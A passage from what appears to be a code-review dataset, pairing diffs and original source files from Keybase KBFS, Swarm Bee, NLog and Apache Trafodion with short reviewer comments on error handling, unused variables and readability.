b.deferLog.CWarningf(ctx, "ArchiveBlockReferences batch size=%d err=%v", len(contexts), err) } else { b.deferLog.CDebugf(ctx, "ArchiveBlockReferences batch size=%d", len(contexts)) } }() _, err = b.batchDowngradeReferences(ctx, tlfID, contexts, true) return err } // IsUnflushed implements the BlockServer interface for BlockServerRemote. 
func (b *BlockServerRemote) IsUnflushed( _ context.Context, _ tlf.ID, _ kbfsblock.ID) ( bool, error) { return false, nil } // batchDowngradeReferences archives or deletes a batch of references func (b *BlockServerRemote) batchDowngradeReferences(ctx context.Context, tlfID tlf.ID, contexts kbfsblock.ContextMap, archive bool) ( doneRefs map[kbfsblock.ID]map[kbfsblock.RefNonce]int, finalError error) { doneRefs = make(map[kbfsblock.ID]map[kbfsblock.RefNonce]int) notDone := b.getNotDone(contexts, doneRefs) throttleErr := backoff.Retry(func() error { var res keybase1.DowngradeReferenceRes var err error if archive { res, err = b.putConn.getClient().ArchiveReferenceWithCount(ctx, keybase1.ArchiveReferenceWithCountArg{ Refs: notDone, Folder: tlfID.String(), }) } else { res, err = b.putConn.getClient().DelReferenceWithCount(ctx, keybase1.DelReferenceWithCountArg{ Refs: notDone, Folder: tlfID.String(), }) } // log errors if err != nil { b.log.CWarningf(ctx, "batchDowngradeReferences archive %t sent=%v done=%v failedRef=%v err=%v", archive, notDone, res.Completed, res.Failed, err) } else { b.log.CDebugf(ctx, "batchDowngradeReferences archive %t notdone=%v all succeeded", archive, notDone) } // update the set of completed reference for _, ref := range res.Completed { bid, err := kbfsblock.IDFromString(ref.Ref.Bid.BlockHash) if err != nil { continue } nonces, ok := doneRefs[bid] if !ok { nonces = make(map[kbfsblock.RefNonce]int) doneRefs[bid] = nonces } nonces[kbfsblock.RefNonce(ref.Ref.Nonce)] = ref.LiveCount } // update the list of references to downgrade notDone = b.getNotDone(contexts, doneRefs) //if context is cancelled, return immediately select { case <-ctx.Done(): finalError = ctx.Err() return nil default: } // check whether to backoff and retry if err != nil { // if error is of type throttle, retry if _, ok := err.(kbfsblock.BServerErrorThrottle); ok { return err } // non-throttle error, do not retry here finalError = err } return nil }, backoff.NewExponentialBackOff()) 
// if backoff has given up retrying, return error if throttleErr != nil { return doneRefs, throttleErr } if finalError == nil { if len(notDone) != 0 { b.log.CErrorf(ctx, "batchDowngradeReferences finished successfully with outstanding refs? all=%v done=%v notDone=%v\n", contexts, doneRefs, notDone) return doneRefs, errors.New("batchDowngradeReferences inconsistent result") } } return doneRefs, finalError } // getNotDone returns the set of block references in "all" that do not yet appear in "results" func (b *BlockServerRemote) getNotDone(all kbfsblock.ContextMap, doneRefs map[kbfsblock.ID]map[kbfsblock.RefNonce]int) ( notDone []keybase1.BlockReference) { for id, idContexts := range all { for _, context := range idContexts { if _, ok := doneRefs[id]; ok { if _, ok1 := doneRefs[id][context.GetRefNonce()]; ok1 { continue } } ref := makeBlockReference(id, context) notDone = append(notDone, ref) } } return notDone } // GetUserQuotaInfo implements the BlockServer interface for BlockServerRemote func (b *BlockServerRemote) GetUserQuotaInfo(ctx context.Context) (info *kbfsblock.QuotaInfo, err error) { b.log.LazyTrace(ctx, "BServer: GetUserQuotaInfo") defer func() { b.log.LazyTrace(ctx, "BServer: GetUserQuotaInfo done (err=%v)", err) }() res, err := b.getConn.getClient().GetUserQuotaInfo(ctx) if err != nil { return nil, err } return kbfsblock.QuotaInfoDecode(res, b.config.Codec()) } // GetTeamQuotaInfo implements the BlockServer interface for BlockServerRemote func (b *BlockServerRemote) GetTeamQuotaInfo( ctx context.Context, tid keybase1.TeamID) ( info *kbfsblock.QuotaInfo, err error) { b.log.LazyTrace(ctx, "BServer: GetTeamQuotaInfo") defer func() { b.log.LazyTrace(ctx, "BServer: GetTeamQuotaInfo done (err=%v)", err) }() res, err := b.getConn.getClient().GetTeamQuotaInfo(ctx, tid) if err != nil { return nil, err } return kbfsblock.QuotaInfoDecode(res, b.config.Codec()) } // Shutdown implements the BlockServer interface for BlockServerRemote. 
func (b *BlockServerRemote) Shutdown(ctx context.Context) { if b.shutdownFn != nil { b.shutdownFn() } b.getConn.shutdown() b.putConn.shutdown() }
1
17,899
Please expand "later behavior". Presumably something to do with the prefetch logic?
keybase-kbfs
go
@@ -66,7 +66,7 @@ func (s *server) splitUpload(ctx context.Context, r io.ReadCloser, l int64) (int response.Message = "upload error" response.Code = http.StatusInternalServerError err = fmt.Errorf("%s: %v", response.Message, err) - return response, err + return swarm.ZeroAddress, err } return bytesPostResponse{Reference: address}, nil }
1
// Copyright 2020 The Swarm Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. package api import ( "context" "errors" "fmt" "io" "net/http" "github.com/gorilla/mux" "github.com/ethersphere/bee/pkg/file" "github.com/ethersphere/bee/pkg/file/joiner" "github.com/ethersphere/bee/pkg/file/splitter" "github.com/ethersphere/bee/pkg/jsonhttp" "github.com/ethersphere/bee/pkg/storage" "github.com/ethersphere/bee/pkg/swarm" ) type bytesPostResponse struct { Reference swarm.Address `json:"reference"` } // bytesUploadHandler handles upload of raw binary data of arbitrary length. func (s *server) bytesUploadHandler(w http.ResponseWriter, r *http.Request) { ctx := r.Context() responseObject, err := s.splitUpload(ctx, r.Body, r.ContentLength) if err != nil { s.Logger.Debugf("bytes upload: %v", err) o := responseObject.(jsonhttp.StatusResponse) jsonhttp.Respond(w, o.Code, o) } else { jsonhttp.OK(w, responseObject) } } func (s *server) splitUpload(ctx context.Context, r io.ReadCloser, l int64) (interface{}, error) { chunkPipe := file.NewChunkPipe() go func() { buf := make([]byte, swarm.ChunkSize) c, err := io.CopyBuffer(chunkPipe, r, buf) if err != nil { s.Logger.Debugf("split upload: io error %d: %v", c, err) s.Logger.Error("io error") return } if c != l { s.Logger.Debugf("split upload: read count mismatch %d: %v", c, err) s.Logger.Error("read count mismatch") return } err = chunkPipe.Close() if err != nil { s.Logger.Errorf("split upload: incomplete file write close %v", err) s.Logger.Error("incomplete file write close") } }() sp := splitter.NewSimpleSplitter(s.Storer) address, err := sp.Split(ctx, chunkPipe, l) var response jsonhttp.StatusResponse if err != nil { response.Message = "upload error" response.Code = http.StatusInternalServerError err = fmt.Errorf("%s: %v", response.Message, err) return response, err } return bytesPostResponse{Reference: address}, nil } // bytesGetHandler handles 
retrieval of raw binary data of arbitrary length. func (s *server) bytesGetHandler(w http.ResponseWriter, r *http.Request) { addressHex := mux.Vars(r)["address"] ctx := r.Context() address, err := swarm.ParseHexAddress(addressHex) if err != nil { s.Logger.Debugf("bytes: parse address %s: %v", addressHex, err) s.Logger.Error("bytes: parse address error") jsonhttp.BadRequest(w, "invalid address") return } j := joiner.NewSimpleJoiner(s.Storer) dataSize, err := j.Size(ctx, address) if err != nil { if errors.Is(err, storage.ErrNotFound) { s.Logger.Debugf("bytes: not found %s: %v", address, err) s.Logger.Error("bytes: not found") jsonhttp.NotFound(w, "not found") return } s.Logger.Debugf("bytes: invalid root chunk %s: %v", address, err) s.Logger.Error("bytes: invalid root chunk") jsonhttp.BadRequest(w, "invalid root chunk") return } w.Header().Set("Content-Type", "application/octet-stream") w.Header().Set("Content-Length", fmt.Sprintf("%d", dataSize)) c, err := file.JoinReadAll(j, address, w) if err != nil && c == 0 { s.Logger.Errorf("bytes: data write %s: %v", address, err) s.Logger.Error("bytes: data input error") jsonhttp.InternalServerError(w, "retrieval fail") } }
1
10,486
The `response` variable is not used, it can be removed, also the fmt.Errorf.
ethersphere-bee
go
@@ -51,10 +51,7 @@ namespace NLog.Internal internal static bool IsNullOrWhiteSpace(string value) { #if NET3_5 - - if (value == null) return true; - if (value.Length == 0) return true; - return String.IsNullOrEmpty(value.Trim()); + return value?.Length > 0 ? string.IsNullOrEmpty(value.Trim()) : true; #else return string.IsNullOrWhiteSpace(value); #endif
1
// // Copyright (c) 2004-2021 Jaroslaw Kowalski <[email protected]>, Kim Christensen, Julian Verdurmen // // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above copyright notice, // this list of conditions and the following disclaimer. // // * Redistributions in binary form must reproduce the above copyright notice, // this list of conditions and the following disclaimer in the documentation // and/or other materials provided with the distribution. // // * Neither the name of Jaroslaw Kowalski nor the names of its // contributors may be used to endorse or promote products derived from this // software without specific prior written permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE // ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE // LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF // SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS // INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN // CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF // THE POSSIBILITY OF SUCH DAMAGE. // using System; using System.Linq; using JetBrains.Annotations; namespace NLog.Internal { /// <summary> /// Helpers for <see cref="string"/>. 
/// </summary> public static class StringHelpers { /// <summary> /// IsNullOrWhiteSpace, including for .NET 3.5 /// </summary> /// <param name="value"></param> /// <returns></returns> [ContractAnnotation("value:null => true")] internal static bool IsNullOrWhiteSpace(string value) { #if NET3_5 if (value == null) return true; if (value.Length == 0) return true; return String.IsNullOrEmpty(value.Trim()); #else return string.IsNullOrWhiteSpace(value); #endif } internal static string[] SplitAndTrimTokens(this string value, char delimiter) { if (IsNullOrWhiteSpace(value)) return ArrayHelper.Empty<string>(); if (value.IndexOf(delimiter) == -1) { return new[] { value.Trim() }; } var result = value.Split(new char[] { delimiter }, StringSplitOptions.RemoveEmptyEntries); for (int i = 0; i < result.Length; ++i) { result[i] = result[i].Trim(); if (string.IsNullOrEmpty(result[i])) return result.Where(s => !IsNullOrWhiteSpace(s)).Select(s => s.Trim()).ToArray(); } return result; } } }
1
22,483
Do you find this really easier to read?
NLog-NLog
.cs
@@ -11388,8 +11388,9 @@ void RelRoot::setMvBindContext(MvBindContext * pMvBindContext) pMvBindContextForScope_ = pMvBindContext; } -void RelRoot::addOneRowAggregates(BindWA* bindWA) +NABoolean RelRoot::addOneRowAggregates(BindWA* bindWA, NABoolean forceGroupByAgg) { + NABoolean GroupByAggNodeAdded = FALSE; RelExpr * childOfRoot = child(0); GroupByAgg *aggNode = NULL; // If the One Row Subquery is already enforced by a scalar aggregate
1
/*********************************************************************** // @@@ START COPYRIGHT @@@ // // Licensed to the Apache Software Foundation (ASF) under one // or more contributor license agreements. See the NOTICE file // distributed with this work for additional information // regarding copyright ownership. The ASF licenses this file // to you under the Apache License, Version 2.0 (the // "License"); you may not use this file except in compliance // with the License. You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, // software distributed under the License is distributed on an // "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY // KIND, either express or implied. See the License for the // specific language governing permissions and limitations // under the License. // // @@@ END COPYRIGHT @@@ **********************************************************************/ /* -*-C++-*- ****************************************************************************** * * File: RelExpr.C * Description: Relational expressions (both physical and logical operators) * Created: 5/17/94 * Language: C++ * * ****************************************************************************** */ #define SQLPARSERGLOBALS_FLAGS // must precede all #include's #define SQLPARSERGLOBALS_NADEFAULTS #include "Debug.h" #include "Sqlcomp.h" #include "AllRelExpr.h" #include "AllItemExpr.h" #include "GroupAttr.h" #include "opt.h" #include "PhyProp.h" #include "mdam.h" #include "ControlDB.h" #include "disjuncts.h" #include "ScanOptimizer.h" #include "CmpContext.h" #include "StmtDDLCreateTrigger.h" #include "ExpError.h" #include "ComTransInfo.h" #include "BindWA.h" #include "Refresh.h" #include "CmpMain.h" #include "ControlDB.h" #include "ElemDDLColDef.h" #include "Analyzer.h" #include "OptHints.h" #include "ComTdbSendTop.h" #include "DatetimeType.h" #include 
"SequenceGeneratorAttributes.h" #include "SqlParserGlobals.h" #include "AppliedStatMan.h" #include "Generator.h" #include "CmpStatement.h" #define TEXT_DISPLAY_LENGTH 1001 // ---------------------------------------------------------------------- // forward declarations // ---------------------------------------------------------------------- // ----------------------------------------------------------------------- // methods for class ExprGroupId // ----------------------------------------------------------------------- ExprGroupId::ExprGroupId() { groupIdMode_ = STANDALONE; node_ = NULL; groupId_ = INVALID_GROUP_ID; } ExprGroupId::ExprGroupId(const ExprGroupId & other) { groupIdMode_ = other.groupIdMode_; node_ = other.node_; groupId_ = other.groupId_; } ExprGroupId::ExprGroupId(RelExpr *node) { groupIdMode_ = STANDALONE; node_ = node; groupId_ = INVALID_GROUP_ID; } ExprGroupId::ExprGroupId(CascadesGroupId groupId) { groupIdMode_ = MEMOIZED; node_ = NULL; groupId_ = groupId; } ExprGroupId & ExprGroupId::operator = (const ExprGroupId & other) { groupIdMode_ = other.groupIdMode_; node_ = other.node_; groupId_ = other.groupId_; return *this; } ExprGroupId & ExprGroupId::operator = (RelExpr * other) { if (groupIdMode_ == MEMOIZED) { // Trying to assign an actual pointer to an ExprGroupId that // is in CascadesMemo. This is materialization of a binding. groupIdMode_ = BINDING; } else if (groupIdMode_ == BINDING) // sanity check, can't directly overwrite another binding ABORT("Didn't call BINDING::release_expr()"); node_ = other; return *this; } ExprGroupId & ExprGroupId::operator = (CascadesGroupId other) { // The expression is now (again) in CascadesMemo without participating in // a binding. This may happen when an expression is copied into CascadesMemo // (groupIdMode_ was STANDALONE) or when a binding is released (groupIdMode_ // was BINDING). The node_ member is no longer a valid pointer. 
if (groupIdMode_ == BINDING && groupId_ != other) ABORT("can't change group of an expression during release of binding"); groupIdMode_ = MEMOIZED; groupId_ = other; node_ = NULL; return *this; } NABoolean ExprGroupId::operator == (const ExprGroupId &other) const { // if the two operands have mode ... then do this: // ---------------------------------------- ------------------ // STANDALONE-STANDALONE: ptrs must match // STANDALONE-MEMOIZED: (x) return FALSE // STANDALONE-BINDING: ptrs must match // MEMOIZED-MEMOIZED: (x) groups must match // MEMOIZED-BINDING: (x) groups must match // BINDING-BINDING: ptrs must match if (node_ == NULL OR other.getPtr() == NULL) return (groupId_ == other.getGroupId()); // cases with (x) else return (node_ == other.getPtr()); // ptrs must match } NABoolean ExprGroupId::operator == (const RelExpr *other) const { CMPASSERT(groupIdMode_ != MEMOIZED); return node_ == other; } CascadesGroupId ExprGroupId::getGroupId() const { return ((groupIdMode_ != STANDALONE)? groupId_ : INVALID_GROUP_ID); } void ExprGroupId::releaseBinding() { if (groupIdMode_ != BINDING) ABORT("binding to release was not established"); groupIdMode_ = MEMOIZED; node_ = NULL; } void ExprGroupId::convertBindingToStandalone() { groupIdMode_ = STANDALONE; } void ExprGroupId::setGroupAttr(GroupAttributes *gaPtr) { // If the expression is either in the standalone mode or is // a part of a binding, then store the Group Attributes // in the node. Group attributes in Cascades can not be set through // an individual expression and an attempt to do this results in an abort. CMPASSERT(groupIdMode_ == STANDALONE); node_->setGroupAttr(gaPtr); } // ExprGroupId::setGroupAttr() GroupAttributes * ExprGroupId::getGroupAttr() const { CMPASSERT(node_ != NULL OR groupIdMode_ == MEMOIZED); // If the expression is either in the standalone mode or is // a part of a binding, then use the Group Attributes that // are stored in the node. 
if (node_ != NULL) return node_->getGroupAttr(); else // otherwise, use the Cascades group's group attributes return (*CURRSTMT_OPTGLOBALS->memo)[groupId_]->getGroupAttr(); } // ExprGroupId::getGroupAttr() // shortcut to get the output estimated log props out of the group // attributes EstLogPropSharedPtr ExprGroupId::outputLogProp(const EstLogPropSharedPtr& inputLogProp) { return getGroupAttr()->outputLogProp(inputLogProp); } // a shortcut to get the bound expression, if it exists ... // or the first logical expression inserted in the Cascades Group or NULL. // Note: The last log expr in the list is the first one inserted. RelExpr * ExprGroupId::getLogExpr() const { if (node_ != NULL) return node_; else if (groupId_ != INVALID_GROUP_ID) return ((*CURRSTMT_OPTGLOBALS->memo)[groupId_]->getLastLogExpr()); return 0; } RelExpr * ExprGroupId::getFirstLogExpr() const { if (node_ != NULL) return node_; else if (groupId_ != INVALID_GROUP_ID) return ((*CURRSTMT_OPTGLOBALS->memo)[groupId_]->getFirstLogExpr()); return 0; } // ----------------------------------------------------------------------- // member functions for class RelExpr // ----------------------------------------------------------------------- THREAD_P ObjectCounter (*RelExpr::counter_)(0); RelExpr::RelExpr(OperatorTypeEnum otype, RelExpr *leftChild, RelExpr *rightChild, CollHeap *outHeap) : ExprNode(otype) ,selection_(NULL) ,RETDesc_(NULL) ,groupAttr_(NULL) ,groupId_(INVALID_GROUP_ID) ,groupNext_(NULL) ,bucketNext_(NULL) ,operatorCost_(NULL) ,rollUpCost_(NULL) ,physProp_(NULL) ,estRowsUsed_((Cardinality)-1) ,inputCardinality_((Cardinality)-1) ,maxCardEst_((Cardinality)-1) ,contextInsensRules_(outHeap) ,contextSensRules_(outHeap) ,accessSet0_(NULL) // Triggers -- ,accessSet1_(NULL) ,uniqueColumnsTree_(NULL) //++MV ,cardConstraint_(NULL) //++MV ,isinBlockStmt_(FALSE) ,firstNRows_(-1) ,flags_(0) ,rowsetIterator_(FALSE) ,tolerateNonFatalError_(UNSPECIFIED_) ,hint_(NULL) ,markedForElimination_(FALSE) 
,isExtraHub_(FALSE) ,potential_(-1) ,seenIUD_(FALSE) ,parentTaskId_(0) ,stride_(0) ,birthId_(0) ,memoExprId_(0) ,sourceMemoExprId_(0) ,sourceGroupId_(0) ,costLimit_(-1) ,cachedTupleFormat_(ExpTupleDesc::UNINITIALIZED_FORMAT) ,cachedResizeCIFRecord_(FALSE) ,dopReduced_(FALSE) ,originalExpr_(NULL) ,operKey_(outHeap) { child_[0] = leftChild; child_[1] = rightChild; (*counter_).incrementCounter(); // QSTUFF setGroupAttr(new (outHeap) GroupAttributes); // QSTUFF } RelExpr::~RelExpr() { // the group attributes maintain a reference count if (groupAttr_ != NULL) groupAttr_->decrementReferenceCount(); // these data structures are always owned by the tree delete selection_; // delete all children, if this is a standalone query // (NOTE: can't use the virtual function getArity() in a destructor!!!) for (Lng32 i = 0; i < MAX_REL_ARITY; i++) { if (child(i).getMode() == ExprGroupId::STANDALONE) { // the input was not obtained from CascadesMemo, so delete it if (child(i).getPtr() != NULL) delete child(i).getPtr(); } } (*counter_).decrementCounter(); delete cardConstraint_; //++MV if (hint_) delete hint_; } // RelExpr::~RelExpr() Int32 RelExpr::getArity() const { switch (getOperatorType()) { case REL_SCAN: return 0; case REL_EXCHANGE: return 1; case REL_JOIN: case REL_TSJ: case REL_ROUTINE_JOIN: case REL_SEMIJOIN: case REL_SEMITSJ: case REL_ANTI_SEMIJOIN: case REL_ANTI_SEMITSJ: case REL_LEFT_JOIN: case REL_FULL_JOIN: case REL_LEFT_TSJ: case REL_NESTED_JOIN: case REL_MERGE_JOIN: case REL_INTERSECT: case REL_EXCEPT: return 2; default: ABORT("RelExpr with unknown arity encountered"); return 0; } } void RelExpr::deleteInstance() { Int32 nc = getArity(); // avoid deleting the children by resetting all child pointers first for (Lng32 i = 0; i < nc; i++) { child(i) = (RelExpr *) NULL; } delete this; } // RelExpr::deleteInstance() TableMappingUDF *RelExpr::castToTableMappingUDF() { return NULL; } ExprNode * RelExpr::getChild(Lng32 index) { return child(index); } // RelExpr::getChild() 
void RelExpr::setChild(Lng32 index, ExprNode * newChild) { if (newChild) { CMPASSERT(newChild->castToRelExpr()); child(index) = newChild->castToRelExpr(); } else child(index) = (RelExpr *)NULL; } // RelExpr::setChild() // get TableDesc from the expression. It could be directly // attached to the expression, as in Scan, or could be a // part of GroupAnalysis, as in cut-opp. For expressions // which do not have a tableDesc attached to them, like Join // it would be NULL TableDesc* RelExpr::getTableDescForExpr() { TableDesc * tableDesc = NULL; if (getOperatorType() == REL_SCAN) { tableDesc = ((Scan *)this)->getTableDesc(); } else { if(getGroupAttr()->getGroupAnalysis() && getGroupAttr()->getGroupAnalysis()->getNodeAnalysis() ) { TableAnalysis * tableAnalysis = getGroupAttr()->getGroupAnalysis()->getNodeAnalysis()->getTableAnalysis(); if (tableAnalysis) tableDesc = tableAnalysis->getTableDesc(); } } return tableDesc; } // This method clears all logical expressions uptill the leaf node // for multi-join. 
The methid should be called only before optimization phases // Reason for that is (1)it is very expensive to synthLogProp and should be avoided // (2) we are resetting number of joined tables, which should not be done once it is // set during optimization phases void RelExpr::clearLogExprForSynthDuringAnalysis() { Int32 numChildren = getArity(); if (numChildren >= 1) { GroupAttributes * grp = getGroupAttr(); grp->setLogExprForSynthesis(NULL); grp->resetNumJoinedTables(1); } // clear the log expr for all children for (Lng32 i = 0; i < numChildren; i++) { // only if the child is not a CascadesGroup or NULL if (child(i).getPtr() != NULL) { child(i)->clearLogExprForSynthDuringAnalysis(); } } } void RelExpr::releaseBindingTree(NABoolean memoIsMoribund) { Int32 nc = getArity(); for (Lng32 i = 0; i < nc; i++) { if (memoIsMoribund || child(i).getMode() == ExprGroupId::BINDING) { // recursively release the bindings of the children's children if (child(i).getPtr() != NULL) child(i)->releaseBindingTree(memoIsMoribund); // release the bindings to the children child(i).convertBindingToStandalone(); } } // for each child // indicate that this expression is no longer part of CascadesMemo, // (although its groupNext_ and bucketNext_ pointers are still valid) groupId_ = INVALID_GROUP_ID; if (memoIsMoribund) { groupAttr_ = NULL; groupNext_ = bucketNext_ = NULL; } } void RelExpr::addSelPredTree(ItemExpr *selpred) { ExprValueId sel = selection_; ItemExprTreeAsList(&sel, ITM_AND).insert(selpred); selection_ = sel.getPtr(); } // RelExpr::addSelPredTree() ItemExpr * RelExpr::removeSelPredTree() { ItemExpr * result = selection_; selection_ = NULL; return result; } // RelExpr::removeSelPredTree() //++ MV - void RelExpr::addUniqueColumnsTree(ItemExpr *uniqueColumnsTree) { ExprValueId t = uniqueColumnsTree_; ItemExprTreeAsList(&t, ITM_ITEM_LIST).insert(uniqueColumnsTree); uniqueColumnsTree_ = t.getPtr(); } ItemExpr *RelExpr::removeUniqueColumnsTree() { ItemExpr *result = uniqueColumnsTree_; 
uniqueColumnsTree_ = NULL; return result; } // MV-- void RelExpr::setGroupAttr(GroupAttributes *gaPtr) { // the new group attributes are now used in one more place if (gaPtr != NULL) gaPtr->incrementReferenceCount(); // the old group attributes are now used in one place less than before // NOTE: old and new group attribute pointers may be the same if (groupAttr_ != NULL) groupAttr_->decrementReferenceCount(); // now assign the new group attribute pointer to the local data member groupAttr_ = gaPtr; } NABoolean RelExpr::reconcileGroupAttr(GroupAttributes *newGroupAttr) { // make sure the new group attributes have all the information needed // and are not inconsistent newGroupAttr->reconcile(*groupAttr_); // unlink from the current group attributes and adopt the new (compatible) // ones setGroupAttr(newGroupAttr); return FALSE; // no re-optimization for now } RelExpr * RelExpr::castToRelExpr() { return this; } const RelExpr * RelExpr::castToRelExpr() const { return this; } NABoolean RelExpr::isLogical() const { return TRUE; } NABoolean RelExpr::isPhysical() const { return FALSE; } NABoolean RelExpr::isCutOp() const { return FALSE; } NABoolean RelExpr::isSubtreeOp() const { return FALSE; } NABoolean RelExpr::isWildcard() const { return FALSE; } ItemExpr * RelExpr::selectList() { // RelRoot redefines this virtual method (see BindRelExpr.cpp); // Tuple and Union use this standard method. 
RETDesc *rd = getRETDesc(); if (rd) { ValueIdList vids; const ColumnDescList &cols = *rd->getColumnList(); for (CollIndex i = 0; i < cols.entries(); i++) vids.insert(cols[i]->getValueId()); return vids.rebuildExprTree(ITM_ITEM_LIST); } return NULL; } SimpleHashValue RelExpr::hash() { // this method is just defined to have a hash method in ExprNode // without referencing class HashValue (which is too complicated // for the common code directory) return treeHash().getValue(); } HashValue RelExpr::topHash() { HashValue result = (Int32) getOperatorType(); // hash the required input and output values from the GroupAttributes if (groupAttr_ != NULL) result ^= groupAttr_->hash(); // hash the ValueIdSet of the selection predicates result ^= predicates_; // the other data members are not significant for the hash function CMPASSERT(selection_ == NULL); // this method doesn't work in the parser return result; } // this method is not virtual, since combining the hash values of the // top node and its children should be independent of the actual node HashValue RelExpr::treeHash() { HashValue result = topHash(); Int32 maxc = getArity(); for (Lng32 i = 0; i < maxc; i++) { if (child(i).getMode() == ExprGroupId::MEMOIZED) // use the numbers of the input CascadesGroup result ^= child(i).getGroupId(); else // call this method recursively for the children result ^= child(i)->treeHash(); } return result; } NABoolean RelExpr::patternMatch(const RelExpr & other) const { return getOperator().match(other.getOperator()); } // Checks if the selection preds at this join node are of the // form FKtable.col1 = UKTable.col1 and FKtable.col1 = UKTable.col1 // and ..., where FKTable.col1 is the FK column that points to // UKTable.col1. // The third arguments matchingPreds is an output parameter. // It is used to send the a list of FKtable.col1 = UKTable.col1 // type predicates back to the caller, so that it can be used // to adjust the selection preds and equiJoinPreds in the join // node. 
NABoolean Join::hasRIMatchingPredicates(const ValueIdList& fkCols, const ValueIdList& ucCols, const TableDesc * compRefTabId, ValueIdSet & matchingPreds) const { // if the size of the fkCols does not match with ucCols then something is wrong. // We also assume below that corresponding cols have identical positions // in the two valueidlists and that all entries here are in terms of VEG. CMPASSERT(fkCols.entries() == ucCols.entries()); // There is not possibility of finding a full match // if number ofselection preds is smaller than the fkCols. // number of selection preds can be larger than fkCols.entries, // for example there may be a predicate on the fktable and some // other table which is being joined up above. Since the fktable // is below this join, this join will have that predicate. if ((getSelectionPredicates().entries() < fkCols.entries())) return FALSE; ValueIdList localFKCols(fkCols); ValueIdList localUCCols(ucCols); ValueIdSet compRefTabNonUCCols(compRefTabId->getColumnVEGList()); ValueIdSet localUCColsSet(localUCCols); compRefTabNonUCCols -= localUCColsSet; NABoolean matchFound = FALSE; const ValueIdSet& selPreds = getSelectionPredicates(); matchingPreds.clear(); for (ValueId x = selPreds.init(); selPreds.next(x); selPreds.advance(x)) { ItemExpr *ie = x.getItemExpr(); matchFound = FALSE; if (ie->getOperatorType() == ITM_VEG_PREDICATE) { ValueId vegRef = ((VEGPredicate *)ie)->getVEG()->getVEGReference()->getValueId(); CollIndex fkidx = localFKCols.index(vegRef); if ((fkidx != NULL_COLL_INDEX)&&(localUCCols[fkidx] == vegRef)) { localFKCols.removeAt(fkidx); localUCCols.removeAt(fkidx); matchingPreds.insert(x); } if (compRefTabNonUCCols.contains(vegRef)) { // return false on a predicate // of the form fktable.x = uniquetable.x where x is a nonkey column. 
matchingPreds.clear(); return FALSE; } } else if ((ie->getOperatorType() == ITM_EQUAL)&& (ie->child(0)->getOperatorType() == ITM_VEG_REFERENCE)&& (ie->child(1)->getOperatorType() == ITM_VEG_REFERENCE)) { ValueId vegRef0 = ((VEGReference *)ie->child(0).getPtr())->getValueId(); ValueId vegRef1 = ((VEGReference *)ie->child(1).getPtr())->getValueId(); ValueId ukVid = NULL_COLL_INDEX; CollIndex fkidx = localFKCols.index(vegRef0); if (fkidx == NULL_COLL_INDEX) { CollIndex fkidx = localFKCols.index(vegRef1); if (fkidx != NULL_COLL_INDEX) ukVid = vegRef0; } else ukVid = vegRef1; if ((fkidx != NULL_COLL_INDEX)&&(localUCCols[fkidx] == ukVid)) { localFKCols.removeAt(fkidx); localUCCols.removeAt(fkidx); matchingPreds.insert(x); } } else { matchingPreds.clear(); return FALSE; // not a VEG Pred (revisit for char-varchar) } } if (localFKCols.isEmpty()) return TRUE ; // all preds have a match with a FK-UC column pair. else { matchingPreds.clear(); return FALSE; } } // Special method added to check for ordered cross product called by // RequiredPhysicalProperty::satisfied() to ensure that if a CQS has // requested an ordered cross product, then one is being produced. NABoolean HashJoin::patternMatch(const RelExpr &other) const { if (other.getOperator() == REL_FORCE_ORDERED_CROSS_PRODUCT) return ((HashJoin *) this)->isOrderedCrossProduct(); else return RelExpr::patternMatch(other); } // Two trees match, if their top nodes and their children are duplicates // (are the same logical or physical expression). This method provides // the generic part for determining a match. It can be called by // redefined virtual methods of derived classes. 
NABoolean RelExpr::duplicateMatch(const RelExpr & other) const { if (getOperatorType() != other.getOperatorType()) return FALSE; CMPASSERT(selection_ == NULL); // this method doesn't work in the parser if (predicates_ != other.predicates_) return FALSE; if (rowsetIterator_ != other.rowsetIterator_) return FALSE; if (tolerateNonFatalError_ != other.tolerateNonFatalError_) return FALSE; Int32 maxc = getArity(); // determine whether the children match for (Lng32 i = 0; i < maxc; i++) { // different situations, depending on whether the child // and the other node's child is in state MEMOIZED, // BINDING, or STANDALONE. See ExprGroupId::operator == // for an explanation for each of the cases if (child(i).getMode() == ExprGroupId::MEMOIZED OR other.child(i).getMode() == ExprGroupId::MEMOIZED) { // cases marked (x) in ExprGroupId::operator == // (groups must match) if (NOT (child(i) == other.child(i))) return FALSE; } else { // outside of CascadesMemo or in a CascadesBinding, then // call this method recursively for the children if (NOT child(i)->duplicateMatch(*other.child(i).getPtr())) return FALSE; } } return TRUE; } const CorrName RelExpr::invalid = CorrName("~X~invalid"); RelExpr * RelExpr::copyTopNode(RelExpr *derivedNode,CollHeap* outHeap) { RelExpr *result; if (derivedNode == NULL) result = new (outHeap) RelExpr(getOperatorType(), NULL, NULL, outHeap); else result = derivedNode; // don't copy pointers to required input/output values, since we don't // allow duplicate expressions the new node is likely to get new group // attributes // copy selection predicates result->predicates_ = predicates_; // copy pointer to the selection expression tree (Parser only) if (selection_ != NULL) result->selection_ = selection_->copyTree(outHeap)->castToItemExpr(); // -- Triggers // Copy the inlining information and access sets. 
